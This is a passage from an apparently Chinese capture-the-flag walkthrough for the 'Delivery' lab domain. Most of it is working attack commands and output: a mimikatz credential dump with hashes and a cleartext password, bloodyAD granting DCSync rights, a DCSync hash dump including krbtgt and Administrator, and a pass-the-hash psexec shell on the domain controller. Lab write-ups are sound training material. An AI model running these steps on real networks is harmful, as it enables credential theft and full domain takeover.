Logon Server      : WIN-HAUWOLAO
Logon Time        : 2025/4/27 16:53:43
SID               : S-1-5-21-2057596273-973658165-3030246172-1000
        msv :
         [00000003] Primary
         * Username : lv
         * Domain   : WIN-HAUWOLAO
         * NTLM     : 85edf6aacad2ac8e2a7a44741eb0b236
         * SHA1     : aab02ea07aee541e9f60a1f6d5a54a2045965743
        tspkg :
        wdigest :
         * Username : lv
         * Domain   : WIN-HAUWOLAO
         * Password : (null)
        kerberos :
         * Username : lv
         * Domain   : WIN-HAUWOLAO
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 91297 (00000000:000164a1)
Session           : Service from 0
User Name         : chenglei
Domain            : XIAORANG
Logon Server      : WIN-DC
Logon Time        : 2025/4/27 15:43:55
SID               : S-1-5-21-3269458654-3569381900-10559451-1105
        msv :
         [00000003] Primary
         * Username : chenglei
         * Domain   : XIAORANG
         * NTLM     : 0c00801c30594a1b8eaa889d237c5382
         * SHA1     : e8848f8a454e08957ec9814b9709129b7101fad7
         * DPAPI    : 89b179dc738db098372c365602b7b0f4
        tspkg :
        wdigest :
         * Username : chenglei
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : chenglei
         * Domain   : XIAORANG.LAB
         * Password : Xt61f3LBhg1
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/4/27 15:43:53
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 53235 (00000000:0000cff3)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/4/27 15:43:53
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * NTLM     : 00f24a2e0e0076b23f55b10e54d4cc25
         * SHA1     : 8c03f31f89359af762fe0f271a0d61a64ef6eca1
        tspkg :
        wdigest :
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : WIN-HAUWOLAO$
         * Domain   : xiaorang.lab
         * Password : 18 81 7a 3c 1c ec 03 ec 71 bd fd a6 5f c7 1d d8 be 20 8f e4 e2 f2 96 d1 01 1a 88 7f 4c 07 89 bd 00 45 80 3d b0 61 e5 73 be e2 b4 01 9b 14 88 64 e7 ad 83 83 65 0a 53 40 9f 44 a9 90 b2 aa 04 c7 e1 23 f5 dd 3e f4 5d b3 13 88 9e 67 1f 0a 8a 18 5f dd 82 d2 f0 e1 41 5d 12 6f 8f bb 44 05 66 8d 10 40 e2 5d 97 c8 48 ea 5d 74 d8 7b 5b 1a 5f 9e 94 3a 21 01 c7 9f a5 c9 79 3c 70 91 4c 52 4e 69 ce f6 fe 0f db 54 2a 7c 3c 3a 71 99 2a a9 3e 3d 4e 06 b1 b7 8d 11 a7 7b 71 5a 7d 8c f3 cb 2b f7 c0 eb 74 64 e7 c7 f0 32 36 d0 03 1f f2 69 25 52 5f 18 05 0e 66 1f 82 b4 a7 99 11 c7 64 b5 78 05 c1 91 94 f7 16 8c d0 04 7e 0f e3 2b 7c 83 af 3d d9 46 fd da d8 cd 5c af 89 cd 93 78 14 68 f5 e4 71 55 0f a1 7d c6 9e f6 7f 0c 5d 62 f6 33 5b 12
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-HAUWOLAO$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/4/27 15:43:52
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : win-hauwolao$
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :

mimikatz # \

拿到了一个域内用户 chenglei，查看 chenglei 的域内权限

C:\Users\Administrator\flag > net user chenglei /domain
这项请求将在域 xiaorang.lab 的域控制器处理。
用户名                 chenglei
全名                   
注释                   
用户的注释             
国家/地区代码          000 (系统默认值)
帐户启用               Yes
帐户到期               从不
上次设置密码           2023/7/11 14:57:52
密码到期               从不
密码可更改             2023/7/12 14:57:52
需要密码               Yes
用户可以更改密码       Yes
允许的工作站           All
登录脚本               
用户配置文件           
主目录                 
上次登录               2025/4/27 16:57:57
可允许的登录小时数     All
本地组成员             
全局组成员             *ACL Admin            * Domain Users         
命令成功完成。

属于 ACL Admin 组，这个组有 WriteDACL 的权限，给 chenglei 去添加 DCSync 权限

1
2
3

┌──(root㉿kali)-[~/Desktop/tmp/123]
└─# bloodyAD --host 172.22.13.6 -d "XIAORANG.LAB" -u chenglei -p Xt61f3LBhg1 add dcsync "chenglei"
[+] chenglei is now able to DCSync

然后用 chenglei 远程登录 mimikatz 抓取域内哈希

mimikatz # lsadump:: dcsync /domian: xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'WIN-DC.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
1104    zhangwen        fa7d776fdfc82d3f43c9d8b7f5312d77        512
502     krbtgt  cb976ec1a1bf8a14a15142c6fecc540e        514
1106    zhangtao        e786c4a4987ced162c496d0519496729        512
1000    WIN-DC$ 5a5c8ad1abcec444c534563d7db5c332        532480
500     Administrator   6341235defdaed66fb7b682665752c9a        512
1105    chenglei        0c00801c30594a1b8eaa889d237c5382        512
1103    WIN-HAUWOLAO$   00f24a2e0e0076b23f55b10e54d4cc25        4096

然后横向就行了

┌──(root㉿kali)-[~/Desktop/tmp/123]
└─# impacket-psexec  -hashes : 6341235defdaed66fb7b682665752c9a Administrator@172.22.13.6
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 172.22.13.6.....
[*] Found writable share ADMIN$
[*] Uploading file hUqShSba.exe
[*] Opening SVCManager on 172.22.13.6.....
[*] Creating service PuTe on 172.22.13.6.....
[*] Starting service PuTe.....
[!] Press help for extra shell commands
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [� 汾 10.0.20348.1787]

[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
(c) Microsoft Corporation����������Ȩ����


C:\Windows\system32 >

flag4 在 C:\Users\Administrator\flag 下

本作品采用知识共享署名-相同方式共享 4.0 国际许可协议进行许可

lvzhouhang

春秋云镜-Delivery

FLAG01

FLAG02

FLAG03

FLAG04